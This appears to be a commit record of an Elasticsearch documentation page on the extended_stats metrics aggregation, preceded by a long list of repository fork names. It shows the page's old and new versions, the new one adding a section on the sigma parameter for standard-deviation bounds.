earch,loconsolutions\/elasticsearch,Rygbee\/elasticsearch,tsohil\/elasticsearch,JervyShi\/elasticsearch,elancom\/elasticsearch,naveenhooda2000\/elasticsearch,maddin2016\/elasticsearch,hechunwen\/elasticsearch,jw0201\/elastic,AshishThakur\/elasticsearch,caengcjd\/elasticsearch,karthikjaps\/elasticsearch,koxa29\/elasticsearch,lmtwga\/elasticsearch,HarishAtGitHub\/elasticsearch,khiraiwa\/elasticsearch,xuzha\/elasticsearch,markwalkom\/elasticsearch,MetSystem\/elasticsearch,wayeast\/elasticsearch,ouyangkongtong\/elasticsearch,djschny\/elasticsearch,nrkkalyan\/elasticsearch,Shekharrajak\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,humandb\/elasticsearch,thecocce\/elasticsearch,wbowling\/elasticsearch,awislowski\/elasticsearch,markwalkom\/elasticsearch,nazarewk\/elasticsearch,EasonYi\/elasticsearch,martinstuga\/elasticsearch,masaruh\/elasticsearch,vroyer\/elasticassandra,jaynblue\/elasticsearch,mikemccand\/elasticsearch,JackyMai\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,18098924759\/elasticsearch,hanst\/elasticsearch,kaneshin\/elasticsearch,ricardocerq\/elasticsearch,wuranbo\/elasticsearch,pozhidaevak\/elasticsearch,Liziyao\/elasticsearch,mapr\/elasticsearch,obourgain\/elasticsearch,mcku\/elasticsearch,abibell\/elasticsearch,amit-shar\/elasticsearch,geidies\/elasticsearch,golubev\/elasticsearch,golubev\/elasticsearch,kubum\/elasticsearch,C-Bish\/elasticsearch,rento19962\/elasticsearch,btiernay\/elasticsearch,skearns64\/elasticsearch,geidies\/elasticsearch,kingaj\/elasticsearch,kunallimaye\/elasticsearch,trangvh\/elasticsearch,ckclark\/elasticsearch,bestwpw\/elasticsearch,likaiwalkman\/elasticsearch,Uiho\/elasticsearch,humandb\/elasticsearch,strapdata\/elassandra,abibell\/elasticsearch,kubum\/elasticsearch,vietlq\/elasticsearch,rajanm\/elasticsearch,liweinan0423\/elasticsearch,masterweb121\/elasticsearch,yuy168\/elasticsearch,kunallimaye\/elasticsearch,andrejserafim\/elasticsearch,kcompher\/elasticsearch,HonzaKral\/elasticsearch,ImpressTV\/elasticsearch,StefanGor\/elasticsearch,martinstuga\/elasticsearch,dataduke\/elasticsearch,s1monw\/elasticsearch,sauravmondallive\/elasticsearch,Asimov4\/elasticsearch,iantruslove\/elasticsearch,Ansh90\/elasticsearch,iamjakob\/elasticsearch,kimimj\/elasticsearch,codebunt\/elasticsearch,MisterAndersen\/elasticsearch,mgalushka\/elasticsearch,springning\/elasticsearch,wbowling\/elasticsearch,F0lha\/elasticsearch,tebriel\/elasticsearch,HarishAtGitHub\/elasticsearch,LeoYao\/elasticsearch,wangtuo\/elasticsearch,feiqitian\/elasticsearch,ydsakyclguozi\/elasticsearch,areek\/elasticsearch,kcompher\/elasticsearch,nrkkalyan\/elasticsearch,Stacey-Gammon\/elasticsearch,ricardocerq\/elasticsearch,nellicus\/elasticsearch,yongminxia\/elasticsearch,kingaj\/elasticsearch,luiseduardohdbackup\/elasticsearch,qwerty4030\/elasticsearch,hirdesh2008\/elasticsearch,dylan8902\/elasticsearch,drewr\/elasticsearch,btiernay\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,jpountz\/elasticsearch,Flipkart\/elasticsearch,kingaj\/elasticsearch,infusionsoft\/elasticsearch,artnowo\/elasticsearch,geidies\/elasticsearch,Stacey-Gammon\/elasticsearch,artnowo\/elasticsearch,scorpionvicky\/elasticsearch,HarishAtGitHub\/elasticsearch,cwurm\/elasticsearch,adrianbk\/elasticsearch,MjAbuz\/elasticsearch,chirilo\/elasticsearch,shreejay\/elasticsearch,vietlq\/elasticsearch,sarwarbhuiyan\/elasticsearch,linglaiyao1314\/elasticsearch,cnfire\/elasticsearch-1,wbowling\/elasticsearch,obourgain\/elasticsearch,milodky\/elasticsearch,jimczi\/elasticsearch,hanst\/elasticsearch,jw0201\/elastic,F0lha\/elasticsearch,jeteve\/elasticsearch,kalimatas\/elasticsearch,pozhidaevak\/elasticsearch,markllama\/elasticsearch,Clairebi\/ElasticsearchClone,HonzaKral\/elasticsearch,petabytedata\/elasticsearch,amaliujia\/elasticsearch,queirozfcom\/elasticsearch,petabytedata\/elasticsearch,Collaborne\/elasticsearch,mm0\/elasticsearch,aglne\/elasticsearch,avikurapati\/elasticsearch,adrianbk\/elasticsearch,jeteve\/elasticsearch,ouyangkongtong\/elasticsearch,ulkas\/elasticsearch,clintongormley\/elasticsearch,jprante\/elasticsearch,xingguang2013\/elasticsearch,TonyChai24\/ESSource,ydsakyclguozi\/elasticsearch,mbrukman\/elasticsearch,huypx1292\/elasticsearch,elancom\/elasticsearch,ouyangkongtong\/elasticsearch,areek\/elasticsearch,mnylen\/elasticsearch,MetSystem\/elasticsearch,anti-social\/elasticsearch,JervyShi\/elasticsearch,strapdata\/elassandra5-rc,ouyangkongtong\/elasticsearch,qwerty4030\/elasticsearch,dongjoon-hyun\/elasticsearch,mm0\/elasticsearch,sneivandt\/elasticsearch,djschny\/elasticsearch,rlugojr\/elasticsearch,lydonchandra\/elasticsearch,rlugojr\/elasticsearch,maddin2016\/elasticsearch,ESamir\/elasticsearch,wimvds\/elasticsearch,IanvsPoplicola\/elasticsearch,Charlesdong\/elasticsearch,mmaracic\/elasticsearch,hechunwen\/elasticsearch,acchen97\/elasticsearch,koxa29\/elasticsearch,hanswang\/elasticsearch,wayeast\/elasticsearch,markwalkom\/elasticsearch,jimhooker2002\/elasticsearch,loconsolutions\/elasticsearch,Siddartha07\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,amit-shar\/elasticsearch,njlawton\/elasticsearch,skearns64\/elasticsearch,andrejserafim\/elasticsearch,mm0\/elasticsearch,acchen97\/elasticsearch,snikch\/elasticsearch,tahaemin\/elasticsearch,vingupta3\/elasticsearch,obourgain\/elasticsearch,andrejserafim\/elasticsearch,apepper\/elasticsearch,cwurm\/elasticsearch,Liziyao\/elasticsearch,nezirus\/elasticsearch,davidvgalbraith\/elasticsearch,kingaj\/elasticsearch,mikemccand\/elasticsearch,fooljohnny\/elasticsearch,Brijeshrpatel9\/elasticsearch,TonyChai24\/ESSource,overcome\/elasticsearch,jaynblue\/elasticsearch,gfyoung\/elasticsearch,ouyangkongtong\/elasticsearch,dylan8902\/elasticsearch,kunallimaye\/elasticsearch,GlenRSmith\/elasticsearch,vingupta3\/elasticsearch,andrestc\/elasticsearch,Brijeshrpatel9\/elasticsearch,zhiqinghuang\/elasticsearch,hydro2k\/elasticsearch,rajanm\/elasticsearch,i-am-Nathan\/elasticsearch,snikch\/elasticsearch,fooljohnny\/elasticsearch,humandb\/elasticsearch,vvcephei\/elasticsearch,Brijeshrpatel9\/elasticsearch,pritishppai\/elasticsearch,mute\/elasticsearch,njlawton\/elasticsearch,ZTE-PaaS\/elasticsearch,phani546\/elasticsearch,amit-shar\/elasticsearch,vrkansagara\/elasticsearch,markharwood\/elasticsearch,slavau\/elasticsearch,tahaemin\/elasticsearch,nomoa\/elasticsearch,yuy168\/elasticsearch,scottsom\/elasticsearch,trangvh\/elasticsearch,alexbrasetvik\/elasticsearch,fred84\/elasticsearch,tebriel\/elasticsearch,pablocastro\/elasticsearch,vingupta3\/elasticsearch,vvcephei\/elasticsearch,fekaputra\/elasticsearch,kenshin233\/elasticsearch,Uiho\/elasticsearch,Chhunlong\/elasticsearch,iacdingping\/elasticsearch,drewr\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,khiraiwa\/elasticsearch,Collaborne\/elasticsearch,knight1128\/elasticsearch,franklanganke\/elasticsearch,mute\/elasticsearch,himanshuag\/elasticsearch,strapdata\/elassandra,Clairebi\/ElasticsearchClone,fekaputra\/elasticsearch,milodky\/elasticsearch,markllama\/elasticsearch,andrestc\/elasticsearch,naveenhooda2000\/elasticsearch,coding0011\/elasticsearch,robin13\/elasticsearch,18098924759\/elasticsearch,masterweb121\/elasticsearch,aglne\/elasticsearch,dpursehouse\/elasticsearch,mohit\/elasticsearch,alexshadow007\/elasticsearch,Charlesdong\/elasticsearch,sc0ttkclark\/elasticsearch,masterweb121\/elasticsearch,luiseduardohdbackup\/elasticsearch,sdauletau\/elasticsearch,markllama\/elasticsearch,infusionsoft\/elasticsearch,achow\/elasticsearch,GlenRSmith\/elasticsearch,mkis-\/elasticsearch,wangyuxue\/elasticsearch,mbrukman\/elasticsearch,onegambler\/elasticsearch,humandb\/elasticsearch,ivansun1010\/elasticsearch,loconsolutions\/elasticsearch,fernandozhu\/elasticsearch,LewayneNaidoo\/elasticsearch,ulkas\/elasticsearch,davidvgalbraith\/elasticsearch,sauravmondallive\/elasticsearch,Collaborne\/elasticsearch,btiernay\/elasticsearch,milodky\/elasticsearch,smflorentino\/elasticsearch,Clairebi\/ElasticsearchClone,mjason3\/elasticsearch,elancom\/elasticsearch,JSCooke\/elasticsearch,huypx1292\/elasticsearch,vrkansagara\/elasticsearch,loconsolutions\/elasticsearch,kenshin233\/elasticsearch,truemped\/elasticsearch,iamjakob\/elasticsearch,anti-social\/elasticsearch,phani546\/elasticsearch,nezirus\/elasticsearch,episerver\/elasticsearch,Siddartha07\/elasticsearch,ivansun1010\/elasticsearch,socialrank\/elasticsearch,avikurapati\/elasticsearch,tahaemin\/elasticsearch,Ansh90\/elasticsearch,slavau\/elasticsearch,mm0\/elasticsearch,masaruh\/elasticsearch,vvcephei\/elasticsearch,masaruh\/elasticsearch,apepper\/elasticsearch,rhoml\/elasticsearch,golubev\/elasticsearch,caengcjd\/elasticsearch,SergVro\/elasticsearch,SergVro\/elasticsearch,shreejay\/elasticsearch,dpursehouse\/elasticsearch,tkssharma\/elasticsearch,winstonewert\/elasticsearch,onegambler\/elasticsearch,jaynblue\/elasticsearch,kunallimaye\/elasticsearch,ydsakyclguozi\/elasticsearch,queirozfcom\/elasticsearch,vrkansagara\/elasticsearch,awislowski\/elasticsearch,girirajsharma\/elasticsearch,jchampion\/elasticsearch,KimTaehee\/elasticsearch,andrestc\/elasticsearch,artnowo\/elasticsearch,Shekharrajak\/elasticsearch,i-am-Nathan\/elasticsearch,pozhidaevak\/elasticsearch,springning\/elasticsearch,AndreKR\/elasticsearch,skearns64\/elasticsearch,hanst\/elasticsearch,lks21c\/elasticsearch,markwalkom\/elasticsearch,kkirsche\/elasticsearch,shreejay\/elasticsearch,beiske\/elasticsearch,lmtwga\/elasticsearch,fred84\/elasticsearch,zkidkid\/elasticsearch,bawse\/elasticsearch,abibell\/elasticsearch,MisterAndersen\/elasticsearch,areek\/elasticsearch,scottsom\/elasticsearch,feiqitian\/elasticsearch,sreeramjayan\/elasticsearch,avikurapati\/elasticsearch,henakamaMSFT\/elasticsearch,Kakakakakku\/elasticsearch,mbrukman\/elasticsearch,sposam\/elasticsearch,dataduke\/elasticsearch,vietlq\/elasticsearch,yynil\/elasticsearch,areek\/elasticsearch,pranavraman\/elasticsearch,clintongormley\/elasticsearch,Shepard1212\/elasticsearch,jbertouch\/elasticsearch,beiske\/elasticsearch,koxa29\/elasticsearch,gmarz\/elasticsearch,knight1128\/elasticsearch,AndreKR\/elasticsearch,dpursehouse\/elasticsearch,kingaj\/elasticsearch,iamjakob\/elasticsearch,kenshin233\/elasticsearch,spiegela\/elasticsearch,spiegela\/elasticsearch,rhoml\/elasticsearch,jpountz\/elasticsearch,mjhennig\/elasticsearch,vrkansagara\/elasticsearch,uschindler\/elasticsearch,alexshadow007\/elasticsearch,Stacey-Gammon\/elasticsearch,MjAbuz\/elasticsearch,KimTaehee\/elasticsearch,Brijeshrpatel9\/elasticsearch,kkirsche\/elasticsearch,likaiwalkman\/elasticsearch,jango2015\/elasticsearch,Clairebi\/ElasticsearchClone,knight1128\/elasticsearch,overcome\/elasticsearch,jaynblue\/elasticsearch,LewayneNaidoo\/elasticsearch,iantruslove\/elasticsearch,lzo\/elasticsearch-1,mrorii\/elasticsearch,gingerwizard\/elasticsearch,springning\/elasticsearch,glefloch\/elasticsearch,jimhooker2002\/elasticsearch,yuy168\/elasticsearch,mm0\/elasticsearch,ThalaivaStars\/OrgRepo1,mm0\/elasticsearch,masterweb121\/elasticsearch,wimvds\/elasticsearch,Liziyao\/elasticsearch,szroland\/elasticsearch,alexshadow007\/elasticsearch,kenshin233\/elasticsearch,snikch\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,wangtuo\/elasticsearch,tebriel\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,clintongormley\/elasticsearch,mapr\/elasticsearch,mcku\/elasticsearch,xuzha\/elasticsearch,wangtuo\/elasticsearch,andrejserafim\/elasticsearch,wbowling\/elasticsearch,Charlesdong\/elasticsearch,kimimj\/elasticsearch,episerver\/elasticsearch,caengcjd\/elasticsearch,GlenRSmith\/elasticsearch,mnylen\/elasticsearch,elancom\/elasticsearch,PhaedrusTheGreek\/elasticsearch,Asimov4\/elasticsearch,alexkuk\/elasticsearch,scorpionvicky\/elasticsearch,huanzhong\/elasticsearch,nrkkalyan\/elasticsearch,gingerwizard\/elasticsearch,phani546\/elasticsearch,Widen\/elasticsearch,karthikjaps\/elasticsearch,Widen\/elasticsearch,C-Bish\/elasticsearch,KimTaehee\/elasticsearch,jchampion\/elasticsearch,myelin\/elasticsearch,robin13\/elasticsearch,mnylen\/elasticsearch,xuzha\/elasticsearch,mkis-\/elasticsearch,mrorii\/elasticsearch,wuranbo\/elasticsearch,MisterAndersen\/elasticsearch,szroland\/elasticsearch,amaliujia\/elasticsearch,mrorii\/elasticsearch,henakamaMSFT\/elasticsearch,jimczi\/elasticsearch,Chhunlong\/elasticsearch,jimczi\/elasticsearch,jsgao0\/elasticsearch,fooljohnny\/elasticsearch,thecocce\/elasticsearch,dongjoon-hyun\/elasticsearch,HonzaKral\/elasticsearch,NBSW\/elasticsearch,jpountz\/elasticsearch,ulkas\/elasticsearch,jimczi\/elasticsearch,khiraiwa\/elasticsearch,kalburgimanjunath\/elasticsearch,tsohil\/elasticsearch,mbrukman\/elasticsearch,wangtuo\/elasticsearch,rajanm\/elasticsearch,hirdesh2008\/elasticsearch,onegambler\/elasticsearch,ESamir\/elasticsearch,naveenhooda2000\/elasticsearch,Rygbee\/elasticsearch,franklanganke\/elasticsearch,sauravmondallive\/elasticsearch,hafkensite\/elasticsearch,s1monw\/elasticsearch,Ansh90\/elasticsearch,fred84\/elasticsearch,Collaborne\/elasticsearch,koxa29\/elasticsearch,mm0\/elasticsearch,maddin2016\/elasticsearch,kimimj\/elasticsearch,Charlesdong\/elasticsearch,achow\/elasticsearch,zeroctu\/elasticsearch,avikurapati\/elasticsearch,clintongormley\/elasticsearch,ouyangkongtong\/elasticsearch,nellicus\/elasticsearch,zeroctu\/elasticsearch,ulkas\/elasticsearch,szroland\/elasticsearch,lzo\/elasticsearch-1,liweinan0423\/elasticsearch,hanst\/elasticsearch,infusionsoft\/elasticsearch,kalburgimanjunath\/elasticsearch,JackyMai\/elasticsearch,likaiwalkman\/elasticsearch,mmaracic\/elasticsearch,yuy168\/elasticsearch,xpandan\/elasticsearch,mcku\/elasticsearch,markllama\/elasticsearch,ESamir\/elasticsearch,pablocastro\/elasticsearch,jango2015\/elasticsearch,SergVro\/elasticsearch,Helen-Zhao\/elasticsearch,petabytedata\/elasticsearch,LeoYao\/elasticsearch,rmuir\/elasticsearch,iantruslove\/elasticsearch,mute\/elasticsearch,markharwood\/elasticsearch,YosuaMichael\/elasticsearch,hirdesh2008\/elasticsearch,lightslife\/elasticsearch,kevinkluge\/elasticsearch,YosuaMichael\/elasticsearch,mute\/elasticsearch,luiseduardohdbackup\/elasticsearch,HonzaKral\/elasticsearch,strapdata\/elassandra5-rc,hirdesh2008\/elasticsearch,KimTaehee\/elasticsearch,sneivandt\/elasticsearch,anti-social\/elasticsearch,diendt\/elasticsearch,Chhunlong\/elasticsearch,truemped\/elasticsearch,areek\/elasticsearch,lzo\/elasticsearch-1,Widen\/elasticsearch,sdauletau\/elasticsearch,nellicus\/elasticsearch,huypx1292\/elasticsearch,tkssharma\/elasticsearch,truemped\/elasticsearch,iamjakob\/elasticsearch,nknize\/elasticsearch,rento19962\/elasticsearch,skearns64\/elasticsearch,hydro2k\/elasticsearch,Charlesdong\/elasticsearch,nazarewk\/elasticsearch,sarwarbhuiyan\/elasticsearch,wuranbo\/elasticsearch,hechunwen\/elasticsearch,easonC\/elasticsearch,Kakakakakku\/elasticsearch,naveenhooda2000\/elasticsearch,jimhooker2002\/elasticsearch,Fsero\/elasticsearch,springning\/elasticsearch,milodky\/elasticsearch,amaliujia\/elasticsearch,hafkensite\/elasticsearch,andrestc\/elasticsearch,iacdingping\/elasticsearch,alexshadow007\/elasticsearch,mbrukman\/elasticsearch,njlawton\/elasticsearch,camilojd\/elasticsearch,henakamaMSFT\/elasticsearch,TonyChai24\/ESSource,mohit\/elasticsearch,mkis-\/elasticsearch,YosuaMichael\/elasticsearch,lightslife\/elasticsearch,cnfire\/elasticsearch-1,lchennup\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,winstonewert\/elasticsearch,geidies\/elasticsearch,AndreKR\/elasticsearch,hirdesh2008\/elasticsearch,huypx1292\/elasticsearch,njlawton\/elasticsearch,achow\/elasticsearch,myelin\/elasticsearch,strapdata\/elassandra-test,sc0ttkclark\/elasticsearch,18098924759\/elasticsearch,ulkas\/elasticsearch,rlugojr\/elasticsearch,javachengwc\/elasticsearch,gmarz\/elasticsearch,zkidkid\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,mortonsykes\/elasticsearch,acchen97\/elasticsearch,mrorii\/elasticsearch,anti-social\/elasticsearch,fforbeck\/elasticsearch,mjhennig\/elasticsearch,overcome\/elasticsearch,gfyoung\/elasticsearch,zhiqinghuang\/elasticsearch,jaynblue\/elasticsearch,nomoa\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,cnfire\/elasticsearch-1,episerver\/elasticsearch,strapdata\/elassandra5-rc,amaliujia\/elasticsearch,ImpressTV\/elasticsearch,fooljohnny\/elasticsearch,pozhidaevak\/elasticsearch,markllama\/elasticsearch,kkirsche\/elasticsearch,vroyer\/elasticassandra,Ansh90\/elasticsearch,alexbrasetvik\/elasticsearch,caengcjd\/elasticsearch,ckclark\/elasticsearch,wittyameta\/elasticsearch,kingaj\/elasticsearch,MichaelLiZhou\/elasticsearch,adrianbk\/elasticsearch,hydro2k\/elasticsearch,winstonewert\/elasticsearch,jchampion\/elasticsearch,beiske\/elasticsearch,mapr\/elasticsearch,beiske\/elasticsearch,Stacey-Gammon\/elasticsearch,mortonsykes\/elasticsearch,geidies\/elasticsearch,xpandan\/elasticsearch,onegambler\/elasticsearch,yongminxia\/elasticsearch,codebunt\/elasticsearch,queirozfcom\/elasticsearch,lmtwga\/elasticsearch,xuzha\/elasticsearch,girirajsharma\/elasticsearch,awislowski\/elasticsearch,nrkkalyan\/elasticsearch,alexbrasetvik\/elasticsearch,jprante\/elasticsearch,umeshdangat\/elasticsearch,lzo\/elasticsearch-1,schonfeld\/elasticsearch,artnowo\/elasticsearch,uschindler\/elasticsearch,StefanGor\/elasticsearch,nrkkalyan\/elasticsearch,AshishThakur\/elasticsearch,kalburgimanjunath\/elasticsearch,karthikjaps\/elasticsearch,hechunwen\/elasticsearch,MaineC\/elasticsearch,sdauletau\/elasticsearch,tsohil\/elasticsearch,mikemccand\/elasticsearch,gingerwizard\/elasticsearch,achow\/elasticsearch,trangvh\/elasticsearch,hirdesh2008\/elasticsearch,kunallimaye\/elasticsearch,mgalushka\/elasticsearch,fforbeck\/elasticsearch,MjAbuz\/elasticsearch,wangyuxue\/elasticsearch,drewr\/elasticsearch,wimvds\/elasticsearch,javachengwc\/elasticsearch,kalburgimanjunath\/elasticsearch,Helen-Zhao\/elasticsearch,lightslife\/elasticsearch,lydonchandra\/elasticsearch,feiqitian\/elasticsearch,golubev\/elasticsearch,lchennup\/elasticsearch,ThalaivaStars\/OrgRepo1,ivansun1010\/elasticsearch,i-am-Nathan\/elasticsearch,Uiho\/elasticsearch,maddin2016\/elasticsearch,a2lin\/elasticsearch,apepper\/elasticsearch,henakamaMSFT\/elasticsearch,jsgao0\/elasticsearch,i-am-Nathan\/elasticsearch,slavau\/elasticsearch,markharwood\/elasticsearch,Stacey-Gammon\/elasticsearch,nomoa\/elasticsearch,khiraiwa\/elasticsearch,sarwarbhuiyan\/elasticsearch,NBSW\/elasticsearch,caengcjd\/elasticsearch,kalburgimanjunath\/elasticsearch,18098924759\/elasticsearch,pablocastro\/elasticsearch,PhaedrusTheGreek\/elasticsearch,sneivandt\/elasticsearch,weipinghe\/elasticsearch,bawse\/elasticsearch,mohit\/elasticsearch,Rygbee\/elasticsearch,trangvh\/elasticsearch,cwurm\/elasticsearch,tsohil\/elasticsearch,Collaborne\/elasticsearch,nknize\/elasticsearch,wbowling\/elasticsearch,Uiho\/elasticsearch,jsgao0\/elasticsearch,abibell\/elasticsearch,luiseduardohdbackup\/elasticsearch,huanzhong\/elasticsearch,maddin2016\/elasticsearch,uschindler\/elasticsearch,Shepard1212\/elasticsearch,dylan8902\/elasticsearch,anti-social\/elasticsearch,lchennup\/elasticsearch,sarwarbhuiyan\/elasticsearch,fred84\/elasticsearch,nazarewk\/elasticsearch,F0lha\/elasticsearch,AndreKR\/elasticsearch,fekaputra\/elasticsearch,AshishThakur\/elasticsearch,cwurm\/elasticsearch,iamjakob\/elasticsearch,yuy168\/elasticsearch,jprante\/elasticsearch,kcompher\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,18098924759\/elasticsearch,apepper\/elasticsearch,Flipkart\/elasticsearch,rhoml\/elasticsearch,nrkkalyan\/elasticsearch,TonyChai24\/ESSource,Clairebi\/ElasticsearchClone,Uiho\/elasticsearch,linglaiyao1314\/elasticsearch,tahaemin\/elasticsearch,nilabhsagar\/elasticsearch,weipinghe\/elasticsearch,fernandozhu\/elasticsearch,Asimov4\/elasticsearch,umeshdangat\/elasticsearch,bestwpw\/elasticsearch,amit-shar\/elasticsearch,mcku\/elasticsearch,pablocastro\/elasticsearch,pozhidaevak\/elasticsearch,hydro2k\/elasticsearch,tahaemin\/elasticsearch,Widen\/elasticsearch,pablocastro\/elasticsearch,robin13\/elasticsearch,djschny\/elasticsearch,lydonchandra\/elasticsearch,pranavraman\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch,milodky\/elasticsearch,sc0ttkclark\/elasticsearch,jpountz\/elasticsearch,tebriel\/elasticsearch,aglne\/elasticsearch,JervyShi\/elasticsearch,PhaedrusTheGreek\/elasticsearch,fforbeck\/elasticsearch,slavau\/elasticsearch,lchennup\/elasticsearch,girirajsharma\/elasticsearch,overcome\/elasticsearch,zhiqinghuang\/elasticsearch,apepper\/elasticsearch,MjAbuz\/elasticsearch,glefloch\/elasticsearch,djschny\/elasticsearch,Collaborne\/elasticsearch,Fsero\/elasticsearch,mkis-\/elasticsearch,Fsero\/elasticsearch,beiske\/elasticsearch,smflorentino\/elasticsearch,phani546\/elasticsearch,YosuaMichael\/elasticsearch,gingerwizard\/elasticsearch,aglne\/elasticsearch,zeroctu\/elasticsearch,jimhooker2002\/elasticsearch,mcku\/elasticsearch,camilojd\/elasticsearch,acchen97\/elasticsearch,schonfeld\/elasticsearch,vroyer\/elassandra,diendt\/elasticsearch,dongjoon-hyun\/elasticsearch,djschny\/elasticsearch,lydonchandra\/elasticsearch,MichaelLiZhou\/elasticsearch,palecur\/elasticsearch,MetSystem\/elasticsearch,elasticdog\/elasticsearch,chirilo\/elasticsearch,yanjunh\/elasticsearch,strapdata\/elassandra,LewayneNaidoo\/elasticsearch,JSCooke\/elasticsearch,pritishppai\/elasticsearch,ulkas\/elasticsearch,mjason3\/elasticsearch,nellicus\/elasticsearch,awislowski\/elasticsearch,masterweb121\/elasticsearch,xingguang2013\/elasticsearch,overcome\/elasticsearch,tkssharma\/elasticsearch,Chhunlong\/elasticsearch,wimvds\/elasticsearch,nezirus\/elasticsearch,truemped\/elasticsearch,brandonkearby\/elasticsearch,xingguang2013\/elasticsearch,wuranbo\/elasticsearch,kcompher\/elasticsearch,palecur\/elasticsearch,spiegela\/elasticsearch,tebriel\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,myelin\/elasticsearch,djschny\/elasticsearch,avikurapati\/elasticsearch,ZTE-PaaS\/elasticsearch,skearns64\/elasticsearch,humandb\/elasticsearch,Shepard1212\/elasticsearch,LewayneNaidoo\/elasticsearch,gingerwizard\/elasticsearch,zhiqinghuang\/elasticsearch,fooljohnny\/elasticsearch,MisterAndersen\/elasticsearch,sarwarbhuiyan\/elasticsearch,jeteve\/elasticsearch,rlugojr\/elasticsearch,mcku\/elasticsearch,khiraiwa\/elasticsearch,queirozfcom\/elasticsearch,LeoYao\/elasticsearch,thecocce\/elasticsearch,mnylen\/elasticsearch,Uiho\/elasticsearch,mmaracic\/elasticsearch,xuzha\/elasticsearch,martinstuga\/elasticsearch,MichaelLiZhou\/elasticsearch,infusionsoft\/elasticsearch,kevinkluge\/elasticsearch","old_file":"docs\/reference\/search\/aggregations\/metrics\/extendedstats-aggregation.asciidoc","new_file":"docs\/reference\/search\/aggregations\/metrics\/extendedstats-aggregation.asciidoc","new_contents":"[[search-aggregations-metrics-extendedstats-aggregation]]\n=== Extended Stats Aggregation\n\nA `multi-value` metrics aggregation that computes stats over numeric values extracted from the aggregated documents. These values can be extracted either from specific numeric fields in the documents, or be generated by a provided script.\n\nThe `extended_stats` aggregations is an extended version of the <<search-aggregations-metrics-stats-aggregation,`stats`>> aggregation, where additional metrics are added such as `sum_of_squares`, `variance`, `std_deviation` and `std_deviation_bounds`.\n\nAssuming the data consists of documents representing exams grades (between 0 and 100) of students\n\n[source,js]\n--------------------------------------------------\n{\n \"aggs\" : {\n \"grades_stats\" : { \"extended_stats\" : { \"field\" : \"grade\" } }\n }\n}\n--------------------------------------------------\n\nThe above aggregation computes the grades statistics over all documents. The aggregation type is `extended_stats` and the `field` setting defines the numeric field of the documents the stats will be computed on. The above will return the following:\n\n\n[source,js]\n--------------------------------------------------\n{\n ...\n\n \"aggregations\": {\n \"grade_stats\": {\n \"count\": 9,\n \"min\": 72,\n \"max\": 99,\n \"avg\": 86,\n \"sum\": 774,\n \"sum_of_squares\": 67028,\n \"variance\": 51.55555555555556,\n \"std_deviation\": 7.180219742846005,\n \"std_deviation_bounds\": {\n \"upper\": 100.36043948569201,\n \"lower\": 71.63956051430799\n }\n }\n }\n}\n--------------------------------------------------\n\nThe name of the aggregation (`grades_stats` above) also serves as the key by which the aggregation result can be retrieved from the returned response.\n\n==== Standard Deviation Bounds\nadded[1.4.3]\n\nBy default, the `extended_stats` metric will return an object called `std_deviation_bounds`, which provides an interval of plus\/minus two standard\ndeviations from the mean. This can be a useful way to visualize variance of your data. If you want a different boundary, for example\nthree standard deviations, you can set `sigma` in the request:\n\n[source,js]\n--------------------------------------------------\n{\n \"aggs\" : {\n \"grades_stats\" : {\n \"extended_stats\" : {\n \"field\" : \"grade\",\n \"sigma\" : 3 <1>\n }\n }\n }\n}\n--------------------------------------------------\n<1> `sigma` controls how many standard deviations +\/- from the mean should be displayed added[1.4.3]\n\n`sigma` can be any non-negative double, meaning you can request non-integer values such as `1.5`. A value of `0` is valid, but will simply\nreturn the average for both `upper` and `lower` bounds.\n\n.Standard Deviation and Bounds require normality\n[NOTE]\n=====\nThe standard deviation and its bounds are displayed by default, but they are not always applicable to all data-sets. Your data must\nbe normally distributed for the metrics to make sense. The statistics behind standard deviations assumes normally distributed data, so\nif your data is skewed heavily left or right, the value returned will be misleading.\n=====\n\n==== Script\n\nComputing the grades stats based on a script:\n\n[source,js]\n--------------------------------------------------\n{\n ...,\n\n \"aggs\" : {\n \"grades_stats\" : { \"extended_stats\" : { \"script\" : \"doc['grade'].value\" } }\n }\n}\n--------------------------------------------------\n\n===== Value Script\n\nIt turned out that the exam was way above the level of the students and a grade correction needs to be applied. We can use value script to get the new stats:\n\n[source,js]\n--------------------------------------------------\n{\n \"aggs\" : {\n ...\n\n \"aggs\" : {\n \"grades_stats\" : {\n \"extended_stats\" : {\n \"field\" : \"grade\",\n \"script\" : \"_value * correction\",\n \"params\" : {\n \"correction\" : 1.2\n }\n }\n }\n }\n }\n}\n--------------------------------------------------","old_contents":"[[search-aggregations-metrics-extendedstats-aggregation]]\n=== Extended Stats Aggregation\n\nA `multi-value` metrics aggregation that computes stats over numeric values extracted from the aggregated documents. These values can be extracted either from specific numeric fields in the documents, or be generated by a provided script.\n\nThe `extended_stats` aggregations is an extended version of the <<search-aggregations-metrics-stats-aggregation,`stats`>> aggregation, where additional metrics are added such as `sum_of_squares`, `variance`, `std_deviation` and `std_deviation_bounds`.\n\nAssuming the data consists of documents representing exams grades (between 0 and 100) of students\n\n[source,js]\n--------------------------------------------------\n{\n \"aggs\" : {\n \"grades_stats\" : { \"extended_stats\" : { \"field\" : \"grade\" } }\n }\n}\n--------------------------------------------------\n\nThe above aggregation computes the grades statistics over all documents. The aggregation type is `extended_stats` and the `field` setting defines the numeric field of the documents the stats will be computed on. The above will return the following:\n\n\n[source,js]\n--------------------------------------------------\n{\n ...\n\n \"aggregations\": {\n \"grade_stats\": {\n \"count\": 9,\n \"min\": 72,\n \"max\": 99,\n \"avg\": 86,\n \"sum\": 774,\n \"sum_of_squares\": 67028,\n \"variance\": 51.55555555555556,\n \"std_deviation\": 7.180219742846005,\n \"std_deviation_bounds\": {\n \"upper\": 100.36043948569201,\n \"lower\": 71.63956051430799\n }\n }\n }\n}\n--------------------------------------------------\n\nThe name of the aggregation (`grades_stats` above) also serves as the key by which the aggregation result can be retrieved from the returned response.\n\n==== Standard Deviation Bounds\ncoming[1.4.3]\n\nBy default, the 